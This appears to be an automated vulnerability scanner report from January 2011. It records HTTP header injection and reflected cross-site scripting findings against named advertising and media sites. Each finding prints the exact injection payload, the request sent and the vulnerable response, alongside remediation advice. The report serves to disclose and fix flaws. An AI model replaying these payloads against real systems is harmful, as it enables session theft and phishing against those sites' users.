GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2111603&PluID=0&w=500&h=350&ord=3732683&ucm=true&ifl=$$ads/eyeblaster/addineyev2.jsp$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/u%3B231345033%3B0-0%3B7%3B27597681%3B2361-500/350%3B40124842/40142629/1%3B%3B%7Eaopt%3D3/0/ff/0%3B%7Esscs%3D%3f$$\ HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0156ae%0d%0a6ce59d4e5ce; B2=; u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; E2=09MY8y8ysF; C3=; u3=1; D3=;
The value of REST URL parameter 2 is copied into the Location response header. The payload 39de9%0d%0a757ae29423 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /servlet/39de9%0d%0a757ae29423 HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /servlet/39de9 757ae29423/ Date: Sun, 09 Jan 2011 02:54:11 GMT Connection: close Content-Length: 91
The URL has moved to <a href="/servlet/39de9 757ae29423/">/servlet/39de9 757ae29423/</a>
The value of REST URL parameter 2 is copied into the Location response header. The payload 46573%0d%0a0d8c9d6be83 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /servlet/46573%0d%0a0d8c9d6be83 HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /servlet/46573 0d8c9d6be83/ Date: Sun, 09 Jan 2011 05:28:21 GMT Connection: close Content-Length: 93
The URL has moved to <a href="/servlet/46573 0d8c9d6be83/">/servlet/46573 0d8c9d6be83/</a>
3. Cross-site scripting (reflected)previousnext There are 712 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f1a2"><script>alert(1)</script>29d113731ef was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=8f1a2"><script>alert(1)</script>29d113731ef HTTP/1.1 Host: ad.turn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=8977556597757145533; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:03:23 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:03:23 GMT Connection: close
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae48c'-alert(1)-'49d3e5006f8 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=193ae48c'-alert(1)-'49d3e5006f8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJipx9oC)FXduyOWimI4KKhq.W^v=7v!+J; sess=1; uuid2=4760492999213801733
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 10-Jan-2011 02:02:34 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 09-Apr-2011 02:02:34 GMT; domain=.adnxs.com; HttpOnly Content-Type: application/x-javascript Date: Sun, 09 Jan 2011 02:02:34 GMT Content-Length: 183
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16c38'-alert(1)-'3fc1cb53627 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match16c38'-alert(1)-'3fc1cb53627 HTTP/1.1 Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJipx9oC)FXduyOWimI4KKhq.W^v=7v!+J; sess=1; uuid2=4760492999213801733
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 10-Jan-2011 02:03:03 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 09-Apr-2011 02:03:03 GMT; domain=.adnxs.com; HttpOnly Content-Type: application/x-javascript Date: Sun, 09 Jan 2011 02:03:03 GMT Content-Length: 183
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload b4f4c<script>alert(1)</script>a52e440cf62 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_261541b4f4c<script>alert(1)</script>a52e440cf62 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536136217419152&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=93533324557B6D4C66B8D07696AFDC1E; Path=/ ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Set-Cookie: evlu=075d4a72-84c6-47f7-8419-eab875d87006; Domain=adxpose.com; Expires=Fri, 27-Jan-2079 05:15:56 GMT; Path=/ Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:01:49 GMT Connection: close
3.5. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.bluelithium.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f479"-alert(1)-"9f537d45c44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=1x1§ion=1678185&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel&1f479"-alert(1)-"9f537d45c44=1 HTTP/1.1 Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536160339719001&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:02:46 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Sun, 09 Jan 2011 02:02:46 GMT Pragma: no-cache Content-Length: 5050 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?1f479"-alert(1)-"9f537d45c44=1&Z=1x1&admeld_callback=http%3a%2f%2ftag.admeld.com%2fpixel&admeld_dataprovider_id=11&admeld_user_id=6acccca4%2dd0e4%2d464e%2da824%2df67cb28d5556&s=1678185&_salt=2966712294";var RM_POP_COOKIE_NAME='ym ...[SNIP]...
3.6. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserving.cpxinteractive.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 645a9"-alert(1)-"c8cb9b7364 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=ad&ad_size=728x90§ion=628381\&645a9"-alert(1)-"c8cb9b7364=1 HTTP/1.1 Host: adserving.cpxinteractive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:03:52 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Sun, 09 Jan 2011 02:03:52 GMT Pragma: no-cache Content-Length: 4334 Age: 0 Connection: close
/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://adserving.cpxinteractive.com/imp?645a9"-alert(1)-"c8cb9b7364=1&Z=728x90&s=628381%5c&_salt=3434864609";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new ...[SNIP]...
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 5975c<script>alert(1)</script>1fdfc17438e was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=85975c<script>alert(1)</script>1fdfc17438e&c2=6135404&c3=9&c4=4762&c5=&c6=&c10=164121&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:10 GMT Date: Sun, 09 Jan 2011 02:02:10 GMT Connection: close Content-Length: 3591
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 9a333<script>alert(1)</script>8a4c3dbbfb7 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=&c6=&c10=1641219a333<script>alert(1)</script>8a4c3dbbfb7&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:14 GMT Date: Sun, 09 Jan 2011 02:02:14 GMT Connection: close Content-Length: 3591
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 74eae<script>alert(1)</script>372646ead38 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=&c6=&c10=164121&c15=74eae<script>alert(1)</script>372646ead38 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:14 GMT Date: Sun, 09 Jan 2011 02:02:14 GMT Connection: close Content-Length: 3591
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload ae5ba<script>alert(1)</script>adbfd959a51 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404ae5ba<script>alert(1)</script>adbfd959a51&c3=9&c4=4762&c5=&c6=&c10=164121&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:11 GMT Date: Sun, 09 Jan 2011 02:02:11 GMT Connection: close Content-Length: 3591
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload c8a72<script>alert(1)</script>d9a8abda3bb was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=9c8a72<script>alert(1)</script>d9a8abda3bb&c4=4762&c5=&c6=&c10=164121&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:11 GMT Date: Sun, 09 Jan 2011 02:02:11 GMT Connection: close Content-Length: 3591
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload c4c5b<script>alert(1)</script>45d5c6bad11 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762c4c5b<script>alert(1)</script>45d5c6bad11&c5=&c6=&c10=164121&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:12 GMT Date: Sun, 09 Jan 2011 02:02:12 GMT Connection: close Content-Length: 3591
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 5bdff<script>alert(1)</script>d89896135b9 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=5bdff<script>alert(1)</script>d89896135b9&c6=&c10=164121&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:13 GMT Date: Sun, 09 Jan 2011 02:02:13 GMT Connection: close Content-Length: 3591
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload dcd0e<script>alert(1)</script>d6e3eca22a6 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=&c6=dcd0e<script>alert(1)</script>d6e3eca22a6&c10=164121&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 16 Jan 2011 02:02:13 GMT Date: Sun, 09 Jan 2011 02:02:13 GMT Connection: close Content-Length: 3591
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc76e<script>alert(1)</script>bcb67c3cc6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faqcc76e<script>alert(1)</script>bcb67c3cc6e HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 327
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /faqcc76e<script>alert(1)</script>bcb67c3cc6e was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c9edc<script>alert(1)</script>e1d9afc7813 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faqc9edc<script>alert(1)</script>e1d9afc7813/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 328
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /faqc9edc<script>alert(1)</script>e1d9afc7813/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 21a51<script>alert(1)</script>fb51523ad13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faq21a51<script>alert(1)</script>fb51523ad13/index.xml HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 337
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /faq21a51<script>alert(1)</script>fb51523ad13/index.xml was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d7f75<script>alert(1)</script>8dac30374f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
